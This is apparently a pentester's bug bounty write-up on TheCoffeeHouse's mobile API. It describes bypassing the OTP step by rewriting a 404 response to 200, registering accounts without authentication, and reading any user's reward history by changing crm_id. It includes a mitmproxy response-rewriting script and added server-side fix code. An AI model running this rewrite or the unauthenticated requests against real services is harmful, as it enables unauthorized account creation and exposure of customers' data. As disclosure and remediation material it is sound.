[Bug!Bounty] Missing Authentication in TheCoffeeHouse Api

Lê Thành Phúc
3 min read · Mar 31, 2020

It was a Sunday night and I couldn't sleep. :((

Bypassing the OTP to reach the new-account registration screen

When the user enters their phone number to log in and taps Next, an OTP is sent to that number and the app shows the OTP input screen. If the OTP is correct and the phone number already exists, the server returns that user's data. If the OTP is correct but the phone number does not exist, the app shows a form for name, first name, last name and birthday to create a new user. If the OTP is wrong, the app shows a "not found" message.

Response for existing phone & correct OTP
Response for wrong OTP
Response for non-existent phone & correct OTP

A trick when pentesting an API: change the HTTP status code of the response!

Once I understood how the API worked, I tried a non-existent phone number together with a wrong OTP. The response was:

HTTP/1.1 404 Not Found
Cache-Control: no-cache, private
Content-Length: 41
Content-Type: application/json
Date: Sun, 15 Mar 2020 17:35:44 GMT
Server: swoole-http-server
Vary: Origin
X-Ratelimit-Limit: 0
X-Ratelimit-Remaining: 0
X-Ratelimit-Reset: 0
Connection: close

{"message":"Not Found","status_code":404}

Using the trick, I changed the response to:

HTTP/1.1 200 OK
Cache-Control: no-cache, private
Content-Length: 39
Content-Type: application/json
Date: Sun, 15 Mar 2020 17:36:52 GMT
Server: swoole-http-server
Vary: Origin
X-Ratelimit-Limit: 0
X-Ratelimit-Remaining: 0
X-Ratelimit-Reset: 0
Connection: close

{"message":"Success","status_code":200}

Oops!! It worked. The app showed the new-user input screen: the client decides which screen to show purely from the status code and body the server returns. And the magic lies in the next part of the article. :D :D
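The status-code rewrite above, as an added example that is not code from the original post: a mitmproxy addon (the post does not say which intercepting proxy was used) that turns the 404 "Not Found" OTP response into the 200 "Success" response shown. The endpoint path is not named in the post, so the OTP_PATH_HINT filter is an assumption; the rewritten body is the 39-byte body from the captured response.

```python
# Added example, not code from the post: mitmproxy addon that rewrites the
# OTP-check response the way the write-up describes (404 -> 200).
# Assumption (not in the post): the OTP endpoint path contains OTP_PATH_HINT.
# Run with:  mitmdump -s otp_rewrite.py   (device proxied through mitmproxy,
# SSL pinning already bypassed, see the note at the end of the post)
import json
from typing import Tuple

try:
    from mitmproxy import http  # noqa: F401  (only present when run under mitmproxy)
except ImportError:  # lets rewrite_otp_response() be exercised without mitmproxy
    http = None

OTP_PATH_HINT = "otp"  # hypothetical; the post never names the endpoint

SUCCESS_BODY = b'{"message":"Success","status_code":200}'  # 39 bytes, as captured


def rewrite_otp_response(status_code: int, body: bytes) -> Tuple[int, bytes, bool]:
    """Return (status, body, changed).

    Only a 404 whose JSON body carries status_code 404 is rewritten, so real
    data responses (200 with user data) and non-JSON errors pass through.
    """
    if status_code != 404:
        return status_code, body, False
    try:
        data = json.loads(body)
    except ValueError:
        return status_code, body, False
    if not (isinstance(data, dict) and data.get("status_code") == 404):
        return status_code, body, False
    return 200, SUCCESS_BODY, True


class OtpRewrite:
    """mitmproxy addon: patches the server response before the app sees it."""

    def response(self, flow):  # flow: mitmproxy.http.HTTPFlow
        if OTP_PATH_HINT not in flow.request.path.lower():
            return
        status, body, changed = rewrite_otp_response(
            flow.response.status_code, flow.response.content or b""
        )
        if changed:
            flow.response.status_code = status
            flow.response.reason = "OK"
            flow.response.content = body  # mitmproxy updates Content-Length


addons = [OtpRewrite()]
```

The rewrite only fires on the exact error shape the post captured, so a genuine 200 carrying user data for an existing phone is never touched; the check that actually decides whether the app proceeds is the one the server should have been enforcing on the next request, not the client.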

Registering a new account without authentication

After bypassing the OTP and filling in the whole form to create a new user, I found that the create-user request is sent without the OTP code. That means you can replay that request to create a user with an arbitrary phone number and arbitrary data, without going through the app or OTP authentication at all.

Request to create a user without any authentication
Response to creating a user without any authentication

Well, well. You can build a PoC based on that request!

Viewing the BEAN reward history of any user ID without authentication

After walking around the app and checking some functions in the API, I found that the View history BEAN reward function fetched a user's history through the crm_id parameter. So I tried a crm_id different from my own user's crm_id (mine was 10xxxx). What makes it worse is that you don't need authentication at all to see it.

Request & response for BEAN reward history, type claim, with crm_id=6xxxx
Request & response for BEAN reward history, type exchange, with crm_id=6xxxx
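Both findings above (the create-user request accepted without any OTP, and BEAN history readable for any crm_id) come down to the server not checking who it is talking to. As an added example that is not TheCoffeeHouse's code, the sketch below shows the two server-side checks that close them: OTP verification hands out a short-lived HMAC token bound to the phone number, registration refuses any request that doesn't carry a valid token for the same phone, and the history endpoint takes the subject from the authenticated session and only lets the crm_id parameter match it. The token format, TTL, function names and in-memory stores are assumptions for illustration.

```python
# Added example, not TheCoffeeHouse's code: what the server side has to check so
# that neither finding works. Token format, TTL, field names and the in-memory
# stores are assumptions for illustration.
import base64
import hashlib
import hmac
import time
from typing import Dict, Optional, Tuple

SECRET = b"replace-with-a-key-from-the-secret-store"  # assumption: server-only key
TOKEN_TTL = 300  # seconds an OTP verification stays usable for registration


def issue_verification_token(phone: str, now: Optional[int] = None) -> str:
    """Issued ONLY after the OTP check passed; binds phone + expiry under an HMAC."""
    now = int(time.time()) if now is None else now
    msg = f"{phone}|{now + TOKEN_TTL}".encode()
    sig = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(msg).decode() + "." + sig


def verified_phone(token: Optional[str], now: Optional[int] = None) -> Optional[str]:
    """Phone the token vouches for, or None if absent, malformed, forged or expired."""
    now = int(time.time()) if now is None else now
    try:
        b64, sig = token.split(".", 1)
        msg = base64.urlsafe_b64decode(b64)
        phone, exp = msg.decode().split("|")
        exp = int(exp)
    except (AttributeError, ValueError):  # None, bad base64, bad UTF-8, bad layout
        return None
    expected = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):  # constant-time, rejects forgeries
        return None
    if exp < now:
        return None
    return phone


USERS: Dict[str, dict] = {}  # crm_id -> profile (constructed store)
# constructed sample data: BEAN history per crm_id
BEAN_HISTORY: Dict[str, list] = {"60001": ["claim 10", "exchange 5"], "100001": ["claim 3"]}


def create_user(body: dict, token: Optional[str]) -> Tuple[int, dict]:
    """Registration endpoint: refuses any request not backed by a fresh OTP token
    for the same phone, which is the check the original create-user call lacked."""
    phone = verified_phone(token)
    if phone is None:
        return 401, {"message": "OTP verification required"}
    if phone != body.get("phone"):
        return 403, {"message": "phone does not match the verified phone"}
    if any(u["phone"] == phone for u in USERS.values()):
        return 409, {"message": "phone already registered"}
    crm_id = str(100000 + len(USERS))
    USERS[crm_id] = {"phone": phone, "name": body.get("name", "")}
    return 201, {"crm_id": crm_id}


def bean_history(session_crm_id: Optional[str], requested_crm_id: str) -> Tuple[int, dict]:
    """History endpoint: the subject comes from the authenticated session, and the
    crm_id in the request is only allowed to match it (closes the IDOR)."""
    if session_crm_id is None:
        return 401, {"message": "authentication required"}
    if requested_crm_id != session_crm_id:
        return 403, {"message": "forbidden"}
    return 200, {"history": BEAN_HISTORY.get(requested_crm_id, [])}
```

With this in place the status-code trick stops mattering: a rewritten 404 still gets the app to the registration form, but the form submission carries no token and is rejected, and the history endpoint no longer trusts a caller-supplied crm_id to pick whose data to return.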

Note: to do any of this you first need to bypass SSL pinning in the app!

I also emailed them about this problem, but perhaps they fixed it without asking me where the bug was, or maybe they decided it wasn't serious. Hihi.


Lê Thành Phúc

#IamPhuc #PenetrationTester #OSCP #eCPPT #eMAPT #eWAPT